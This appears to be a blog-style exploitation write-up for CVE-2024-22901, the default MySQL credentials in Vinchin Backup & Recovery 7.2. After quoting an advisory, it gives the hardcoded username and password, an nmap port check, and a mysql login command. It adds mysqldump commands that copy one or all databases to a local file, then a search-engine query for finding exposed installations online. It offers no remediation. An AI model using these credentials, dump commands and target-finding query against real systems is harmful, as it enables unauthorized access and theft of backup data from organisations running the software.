CVE-2024-22901
Default MYSQL Credentials in Vinchin Backup & Recovery
"A critical security issue, identified as CVE-2024-22901, has been discovered in Vinchin Backup & Recovery version 7.2.
The software has been found to use default MYSQL credentials, which could lead to significant security risks.
Vinchin has not addressed previous disclosures, including CVE-2022-35866, and has not patched the reported vulnerabilities.
The presence of these unresolved issues, now compounded by the newly discovered vulnerability of default MYSQL credentials, opens up potential avenues for easy unauthenticated Remote Code Execution (RCE).
This lack of response is alarming for a product that is certified in cybersecurity and poses a considerable risk to its users."
-seclists.org
There is not much to say, the username is vinchin and the password yunqi123456.
The MySQL server is running on the default port 3306, to check if the port is open just execute the following command using nmap: nmap -p 3306 [IP address].
You can connect to the database management system using the command mysql-client or mysql present inside the mariadb package.
Command for connection: mysql -h -u vinchin -pyunqi123456.
[*] commands.png
mysqldump -h [host] -u vinchin -pyunqi123456 [db name] --result-file=dump.sql
To download all databases, replace the db name with --all-databases parameter.
mysqldump -h [host] -u vinchin -pyunqi123456 --all-databases --result-file=dump.sql
Obviously, the download will take time.
You can find a more detailed documentation about mysqldump here.
Looking for vulnerable targets
Due to obvious reasons, mysql doesn't show information about users or databases so we have to filter results by the title of login page.
With the query web.title="Vinchin Backup & Recovery", hunter reports hundreds of results.
[*] hunter_results.png
